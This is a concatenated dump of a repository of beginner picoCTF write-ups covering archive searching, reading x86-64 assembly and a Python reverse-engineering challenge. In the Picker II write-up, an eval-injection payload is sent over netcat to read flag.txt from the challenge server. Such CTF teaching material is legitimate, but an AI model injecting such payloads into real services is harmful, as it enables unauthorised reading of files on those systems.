big-zip-files.zip 27 | Archive: big-zip-files.zip 28 | creating: big-zip-files/ 29 | extracting: big-zip-files/jpvaawkrpno.txt 30 | inflating: big-zip-files/oxbcyjsy.txt 31 | inflating: big-zip-files/hllhxlvvdgiii.txt 32 | inflating: big-zip-files/bdvnqbuutefealgveyiqd.txt 33 | inflating: big-zip-files/fudfsewmaafsbniiyktzr.txt 34 | creating: big-zip-files/folder_fqmjtuthge/ 35 | inflating: big-zip-files/folder_fqmjtuthge/file_eaigogtrdslbxenbnfisxepj.txt 36 | inflating: big-zip-files/folder_fqmjtuthge/file_ygocxgpzuxqjwfs.txt 37 | inflating: big-zip-files/folder_fqmjtuthge/file_lqqprxhjtarithwygepdnlf.txt 38 | inflating: big-zip-files/folder_fqmjtuthge/file_pdpygeaphbafepdzw.txt 39 | inflating: big-zip-files/folder_fqmjtuthge/file_wwxeisxucykwqtkgcrkv.txt 40 | inflating: big-zip-files/folder_fqmjtuthge/file_aowfebnypzsretakipi.txt 41 | inflating: big-zip-files/folder_fqmjtuthge/file_jlfivzrgcubr.txt 42 | inflating: big-zip-files/folder_fqmjtuthge/file_pnwvfhejwcqseezvmdv.txt 43 | inflating: big-zip-files/folder_fqmjtuthge/file_lajnafrfzk.txt 44 | inflating: big-zip-files/folder_fqmjtuthge/file_zqjgjdxgn.txt 45 | creating: big-zip-files/folder_fqmjtuthge/folder_woanzvubrt/ 46 | < ---snip--- > 47 | ``` 48 | 49 | The file listing is looong so we definetly needs to search for the flag with `grep`. Search 50 | * recusively (-r), 51 | * with extended regular expressions (-E), 52 | * output only the matching text (-o), and 53 | * suppress output of file names (-h). 54 | ``` 55 | ┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Big_Zip] 56 | └─$ grep -r -E -o -h 'picoCTF{.*}' big-zip-files 57 | picoCTF{} 58 | ``` 59 | 60 | For additional information, please see the references below. 61 | 62 | ## References 63 | 64 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 65 | - [unzip - Linux manual page](https://linux.die.net/man/1/unzip) 66 | -------------------------------------------------------------------------------- /picoGym_Exclusive/General_Skills/First_Find.md: -------------------------------------------------------------------------------- 1 | # First Find 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoGym Exclusive, General Skills 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Unzip this archive and find the file named 'uber-secret.txt' 15 | 16 | Hints: 17 | (None) 18 | ``` 19 | Challenge link: [https://play.picoctf.org/practice/challenge/320](https://play.picoctf.org/practice/challenge/320) 20 | 21 | ## Solution 22 | 23 | Unzip the file 24 | ``` 25 | ┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Fist_Find] 26 | └─$ unzip files.zip 27 | Archive: files.zip 28 | creating: files/ 29 | creating: files/satisfactory_books/ 30 | creating: files/satisfactory_books/more_books/ 31 | inflating: files/satisfactory_books/more_books/37121.txt.utf-8 32 | inflating: files/satisfactory_books/23765.txt.utf-8 33 | inflating: files/satisfactory_books/16021.txt.utf-8 34 | inflating: files/13771.txt.utf-8 35 | creating: files/adequate_books/ 36 | creating: files/adequate_books/more_books/ 37 | creating: files/adequate_books/more_books/.secret/ 38 | creating: files/adequate_books/more_books/.secret/deeper_secrets/ 39 | creating: files/adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/ 40 | extracting: files/adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/uber-secret.txt 41 | inflating: files/adequate_books/more_books/1023.txt.utf-8 42 | inflating: files/adequate_books/46804-0.txt 43 | inflating: files/adequate_books/44578.txt.utf-8 44 | creating: files/acceptable_books/ 45 | creating: files/acceptable_books/more_books/ 46 | inflating: files/acceptable_books/more_books/40723.txt.utf-8 47 | inflating: files/acceptable_books/17880.txt.utf-8 48 | inflating: files/acceptable_books/17879.txt.utf-8 49 | inflating: files/14789.txt.utf-8 50 | ``` 51 | 52 | The path to the file is visible in the middle of the file listing (prefixed with extracting) but let's search for it anyway 53 | ``` 54 | ┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Fist_Find] 55 | └─$ find files -name uber-secret.txt 56 | files/adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/uber-secret.txt 57 | ``` 58 | 59 | Finally, display the flag with `cat` 60 | ``` 61 | ┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Fist_Find] 62 | └─$ cat files/adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/uber-secret.txt 63 | picoCTF{} 64 | ``` 65 | 66 | For additional information, please see the references below. 67 | 68 | ## References 69 | 70 | - [cat - Linux manual page](https://man7.org/linux/man-pages/man1/cat.1.html) 71 | - [find - Linux manual page](https://man7.org/linux/man-pages/man1/find.1.html) 72 | - [unzip - Linux manual page](https://linux.die.net/man/1/unzip) 73 | -------------------------------------------------------------------------------- /picoGym_Exclusive/General_Skills/README.md: -------------------------------------------------------------------------------- 1 | # General Skills Challenges 2 | 3 | 3 Challenges: 4 | - [ASCII Numbers](ASCII_Numbers.md) 5 | - [Big Zip](Big_Zip.md) 6 | - [First Find](First_Find.md) 7 | -------------------------------------------------------------------------------- /picoGym_Exclusive/README.md: -------------------------------------------------------------------------------- 1 | # picoGym Exclusive Challenges 2 | 3 | ## Binary Exploitation Challenges 4 | 5 | 1 Challenge: 6 | - [Local Target](Binary_Exploitation/Local_Target.md) 7 | 8 | ## Forensics Challenges 9 | 10 | 1 Challenge: 11 | - [WPA-ing Out](Forensics/WPA-ing_Out.md) 12 | 13 | ## General Skills Challenges 14 | 15 | 3 Challenges: 16 | - [ASCII Numbers](General_Skills/ASCII_Numbers.md) 17 | - [Big Zip](General_Skills/Big_Zip.md) 18 | - [First Find](General_Skills/First_Find.md) 19 | 20 | ## Reverse Engineering Challenges 21 | 22 | 13 Challenges: 23 | - [ASCII FTW](Reverse_Engineering/ASCII_FTW.md) 24 | - [Bit-O-Asm-1](Reverse_Engineering/Bit-O-Asm-1.md) 25 | - [Bit-O-Asm-2](Reverse_Engineering/Bit-O-Asm-2.md) 26 | - [Bit-O-Asm-3](Reverse_Engineering/Bit-O-Asm-3.md) 27 | - [Bit-O-Asm-4](Reverse_Engineering/Bit-O-Asm-4.md) 28 | - [GDB baby step 1](Reverse_Engineering/GDB_baby_step_1.md) 29 | - [GDB baby step 2](Reverse_Engineering/GDB_baby_step_2.md) 30 | - [GDB baby step 3](Reverse_Engineering/GDB_baby_step_3.md) 31 | - [GDB baby step 4](Reverse_Engineering/GDB_baby_step_4.md) 32 | - [Picker I](Reverse_Engineering/Picker_I.md) 33 | - [Picker II](Reverse_Engineering/Picker_II.md) 34 | - [Picker III](Reverse_Engineering/Picker_III.md) 35 | - [Picker IV](Reverse_Engineering/Picker_IV.md) 36 | 37 | 38 | ## Web Exploitation Challenges 39 | 40 | 1 Challenge: 41 | - [JAuth](Web_Exploitation/JAuth.md) 42 | -------------------------------------------------------------------------------- /picoGym_Exclusive/Reverse_Engineering/Bit-O-Asm-1.md: -------------------------------------------------------------------------------- 1 | # Bit-O-Asm-1 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoGym Exclusive, Reverse Engineering, X86_64 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Can you figure out what is in the eax register? 15 | 16 | Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. 17 | If the answer was 0x11 your flag would be picoCTF{17}. 18 | 19 | Hints: 20 | 1. As with most assembly, there is a lot of noise in the instruction dump. 21 | Find the one line that pertains to this question and don't second guess yourself! 22 | ``` 23 | Challenge link: [https://play.picoctf.org/practice/challenge/391](https://play.picoctf.org/practice/challenge/391) 24 | 25 | ## Solution 26 | 27 | Study the assembler listing to figure out what happens. The interesting line is prefixed with <+15>. 28 | For more information on the x64 instruction set, see references below. 29 | ``` 30 | <+0>: endbr64 31 | <+4>: push rbp 32 | <+5>: mov rbp,rsp 33 | <+8>: mov DWORD PTR [rbp-0x4],edi 34 | <+11>: mov QWORD PTR [rbp-0x10],rsi 35 | <+15>: mov eax,0x30 36 | <+20>: pop rbp 37 | <+21>: ret 38 | ``` 39 | 40 | The flag should be in decimal format so convert it in Python: 41 | ``` 42 | ┌──(kali㉿kali)-[/picoCTF/picoGym/Reverse_Engineering/Bit-O-Asm-1] 43 | └─$ python 44 | Python 3.10.9 (main, Dec 7 2022, 13:47:07) [GCC 12.2.0] on linux 45 | Type "help", "copyright", "credits" or "license" for more information. 46 | >>> 0x30 47 | 48 48 | ``` 49 | 50 | Finally, create the flag like this `picoCTF{}`. 51 | 52 | ## References 53 | 54 | Intel 64 and IA-32 Architectures Developer's Manuals in PDF-format 55 | - [Volume 2A: Instruction Set Reference, A-M](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2a-manual.pdf) 56 | - [Volume 2B: Instruction Set Reference, M-U](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2b-manual.pdf) 57 | - [Volume 2C: Instruction Set Reference, V-Z](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2c-manual.pdf) 58 | -------------------------------------------------------------------------------- /picoGym_Exclusive/Reverse_Engineering/Bit-O-Asm-2.md: -------------------------------------------------------------------------------- 1 | # Bit-O-Asm-2 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoGym Exclusive, Reverse Engineering, X86_64 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Can you figure out what is in the eax register? 15 | 16 | Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. 17 | If the answer was 0x11 your flag would be picoCTF{17}. 18 | 19 | Hints: 20 | 1. PTR's or 'pointers', reference a location in memory where values can be stored. 21 | ``` 22 | Challenge link: [https://play.picoctf.org/practice/challenge/392](https://play.picoctf.org/practice/challenge/392) 23 | 24 | ## Solution 25 | 26 | Study the assembler listing to figure out what happens. The interesting line is prefixed with <+15>. 27 | The RBP register points to the current stack frame. For more information on the x64 instruction set, see references below. 28 | ``` 29 | <+0>: endbr64 30 | <+4>: push rbp 31 | <+5>: mov rbp,rsp 32 | <+8>: mov DWORD PTR [rbp-0x14],edi 33 | <+11>: mov QWORD PTR [rbp-0x20],rsi 34 | <+15>: mov DWORD PTR [rbp-0x4],0x9fe1a 35 | <+22>: mov eax,DWORD PTR [rbp-0x4] 36 | <+25>: pop rbp 37 | <+26>: ret 38 | ``` 39 | 40 | The flag should be in decimal format so convert it in Python: 41 | ``` 42 | ┌──(kali㉿kali)-[/picoCTF/picoGym/Reverse_Engineering/Bit-O-Asm-2] 43 | └─$ python 44 | Python 3.10.9 (main, Dec 7 2022, 13:47:07) [GCC 12.2.0] on linux 45 | Type "help", "copyright", "credits" or "license" for more information. 46 | >>> 0x9fe1a 47 | 654874 48 | ``` 49 | 50 | Finally, create the flag like this `picoCTF{}`. 51 | 52 | ## References 53 | 54 | Intel 64 and IA-32 Architectures Developer's Manuals in PDF-format 55 | - [Volume 2A: Instruction Set Reference, A-M](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2a-manual.pdf) 56 | - [Volume 2B: Instruction Set Reference, M-U](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2b-manual.pdf) 57 | - [Volume 2C: Instruction Set Reference, V-Z](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2c-manual.pdf) 58 | -------------------------------------------------------------------------------- /picoGym_Exclusive/Reverse_Engineering/Bit-O-Asm-3.md: -------------------------------------------------------------------------------- 1 | # Bit-O-Asm-3 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoGym Exclusive, Reverse Engineering, X86_64 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Can you figure out what is in the eax register? 15 | 16 | Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. 17 | If the answer was 0x11 your flag would be picoCTF{17}. 18 | 19 | Hints: 20 | 1. Not everything in this disassembly listing is optimal. 21 | ``` 22 | Challenge link: [https://play.picoctf.org/practice/challenge/393](https://play.picoctf.org/practice/challenge/393) 23 | 24 | ## Solution 25 | 26 | Study the assembler listing to figure out what happens. The interesting lines are prefixed with <+15> through <+36>. 27 | The RBP register points to the current stack frame. 28 | ``` 29 | <+0>: endbr64 30 | <+4>: push rbp 31 | <+5>: mov rbp,rsp 32 | <+8>: mov DWORD PTR [rbp-0x14],edi 33 | <+11>: mov QWORD PTR [rbp-0x20],rsi 34 | <+15>: mov DWORD PTR [rbp-0xc],0x9fe1a 35 | <+22>: mov DWORD PTR [rbp-0x8],0x4 36 | <+29>: mov eax,DWORD PTR [rbp-0xc] 37 | <+32>: imul eax,DWORD PTR [rbp-0x8] 38 | <+36>: add eax,0x1f5 39 | <+41>: mov DWORD PTR [rbp-0x4],eax 40 | <+44>: mov eax,DWORD PTR [rbp-0x4] 41 | <+47>: pop rbp 42 | <+48>: ret 43 | ``` 44 | 45 | In more detail the following happens: 46 | * The stack at position rbp-0xc is set to 0x9fe1a 47 | * The stack at position rbp-0x8 is set to 0x4 48 | * EAX is set to the value at position rbp-0xc (i.e. 0x9fe1a) 49 | * EAX is multiplied with the value at position rbp-0x8 (i.e. 0x4) 50 | * 0x1f5 is added to EAX 51 | 52 | For more information on the x64 instruction set, see references below. 53 | 54 | The flag should be in decimal format so convert it in Python: 55 | ``` 56 | ┌──(kali㉿kali)-[/picoCTF/picoGym/Reverse_Engineering/Bit-O-Asm-3] 57 | └─$ python 58 | Python 3.10.9 (main, Dec 7 2022, 13:47:07) [GCC 12.2.0] on linux 59 | Type "help", "copyright", "credits" or "license" for more information. 60 | >>> 0x9fe1a*4 + 0x1f5 61 | 2619997 62 | ``` 63 | 64 | Finally, create the flag like this `picoCTF{}`. 65 | 66 | ## References 67 | 68 | Intel 64 and IA-32 Architectures Developer's Manuals in PDF-format 69 | - [Volume 2A: Instruction Set Reference, A-M](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2a-manual.pdf) 70 | - [Volume 2B: Instruction Set Reference, M-U](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2b-manual.pdf) 71 | - [Volume 2C: Instruction Set Reference, V-Z](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2c-manual.pdf) 72 | -------------------------------------------------------------------------------- /picoGym_Exclusive/Reverse_Engineering/Picker_II.md: -------------------------------------------------------------------------------- 1 | # Picker II 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoGym Exclusive, Reverse Engineering, Python 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Can you figure out how this program works to get the flag? 15 | 16 | Connect to the program with netcat: 17 | `$ nc saturn.picoctf.net 59461` 18 | 19 | Hints: 20 | 1. Can you do what win does with your input to the program? 21 | ``` 22 | Challenge link: [https://play.picoctf.org/practice/challenge/401](https://play.picoctf.org/practice/challenge/401) 23 | 24 | ## Solution 25 | 26 | ### Study the source code 27 | 28 | Let's start by studying the "main" part of the python program. 29 | ```python 30 | while(True): 31 | try: 32 | user_input = input('==> ') 33 | if( filter(user_input) ): 34 | eval(user_input + '()') 35 | else: 36 | print('Illegal input') 37 | except Exception as e: 38 | print(e) 39 | ``` 40 | 41 | The `filter` function is new and will make things somewhat harder for us 42 | ```python 43 | def filter(user_input): 44 | if 'win' in user_input: 45 | return False 46 | return True 47 | ``` 48 | 49 | The `win` function is the same as in the previous 'Picker I' challenge 50 | ```python 51 | def win(): 52 | # This line will not work locally unless you create your own 'flag.txt' in 53 | # the same directory as this script 54 | flag = open('flag.txt', 'r').read() 55 | #flag = flag[:-1] 56 | flag = flag.strip() 57 | str_flag = '' 58 | for c in flag: 59 | str_flag += str(hex(ord(c))) + ' ' 60 | print(str_flag) 61 | ``` 62 | 63 | ### Do a test run 64 | 65 | Let's try to call the `win` function directly 66 | ``` 67 | ┌──(kali㉿kali)-[/picoCTF/picoGym/Reverse_Engineering/Picker_II] 68 | └─$ nc saturn.picoctf.net 59461 69 | ==> win 70 | Illegal input 71 | ==> Win 72 | name 'Win' is not defined 73 | ``` 74 | 75 | ### Get the flag 76 | 77 | Finally, let's read the flag directly as suggested in the hint 78 | ``` 79 | ==> print(open('flag.txt', 'r').read()) 80 | picoCTF{} 81 | 'NoneType' object is not callable 82 | ==> 83 | ``` 84 | 85 | For additional information, please see the references below. 86 | 87 | ## References 88 | 89 | - [Reading and writing files - Python](https://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files) 90 | -------------------------------------------------------------------------------- /picoGym_Exclusive/Reverse_Engineering/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering Challenges 2 | 3 | 13 Challenges: 4 | - [ASCII FTW](ASCII_FTW.md) 5 | - [Bit-O-Asm-1](Bit-O-Asm-1.md) 6 | - [Bit-O-Asm-2](Bit-O-Asm-2.md) 7 | - [Bit-O-Asm-3](Bit-O-Asm-3.md) 8 | - [Bit-O-Asm-4](Bit-O-Asm-4.md) 9 | - [GDB baby step 1](GDB_baby_step_1.md) 10 | - [GDB baby step 2](GDB_baby_step_2.md) 11 | - [GDB baby step 3](GDB_baby_step_3.md) 12 | - [GDB baby step 4](GDB_baby_step_4.md) 13 | - [Picker I](Picker_I.md) 14 | - [Picker II](Picker_II.md) 15 | - [Picker III](Picker_III.md) 16 | - [Picker IV](Picker_IV.md) 17 | -------------------------------------------------------------------------------- /picoGym_Exclusive/Web_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Web Exploitation Challenges 2 | 3 | 1 Challenge: 4 | - [JAuth](JAuth.md) 5 | -------------------------------------------------------------------------------- /picoGym_Exclusive/Web_Exploitation/The_Token_Cookie_in_DevTools.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoGym_Exclusive/Web_Exploitation/The_Token_Cookie_in_DevTools.png -------------------------------------------------------------------------------- /picoMini_by_redpwn/Binary_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Binary Exploitation Challenges 2 | 3 | 1 Challenge: 4 | - [clutter-overflow](clutter-overflow.md) 5 | -------------------------------------------------------------------------------- /picoMini_by_redpwn/Cryptography/README.md: -------------------------------------------------------------------------------- 1 | # Cryptography Challenges 2 | 3 | 3 Challenges: 4 | - [spelling-quiz](spelling-quiz.md) 5 | - [triple-secure](triple-secure.md) 6 | - [XtraORdinary](XtraORdinary.md) 7 | -------------------------------------------------------------------------------- /picoMini_by_redpwn/Forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics Challenges 2 | 3 | 1 Challenge: 4 | - [advanced-potion-making](advanced-potion-making.md) 5 | -------------------------------------------------------------------------------- /picoMini_by_redpwn/README.md: -------------------------------------------------------------------------------- 1 | # picoMini by redpwn Challenges 2 | 3 | ## Binary Exploitation Challenges 4 | 5 | 1 Challenge: 6 | - [clutter-overflow](Binary_Exploitation/clutter-overflow.md) 7 | 8 | ## Cryptography Challenges 9 | 10 | 3 Challenges: 11 | - [spelling-quiz](Cryptography/spelling-quiz.md) 12 | - [triple-secure](Cryptography/triple-secure.md) 13 | - [XtraORdinary](Cryptography/XtraORdinary.md) 14 | 15 | ## Forensics Challenges 16 | 17 | 1 Challenge: 18 | - [advanced-potion-making](Forensics/advanced-potion-making.md) 19 | 20 | ## Reverse Engineering Challenges 21 | 22 | 1 Challenge: 23 | - [not crypto](Reverse_Engineering/not_crypto.md) 24 | 25 | ## Web Exploitation Challenges 26 | 27 | 2 Challenges: 28 | - [caas](Web_Exploitation/caas.md) 29 | - [login](Web_Exploitation/login.md) 30 | -------------------------------------------------------------------------------- /picoMini_by_redpwn/Reverse_Engineering/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering Challenges 2 | 3 | 1 Challenge: 4 | - [not crypto](not_crypto.md) 5 | -------------------------------------------------------------------------------- /picoMini_by_redpwn/Web_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Web Exploitation Challenges 2 | 3 | 2 Challenges: 4 | - [caas](caas.md) 5 | - [login](login.md) 6 | -------------------------------------------------------------------------------- /picoctf_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoctf_logo.png --------------------------------------------------------------------------------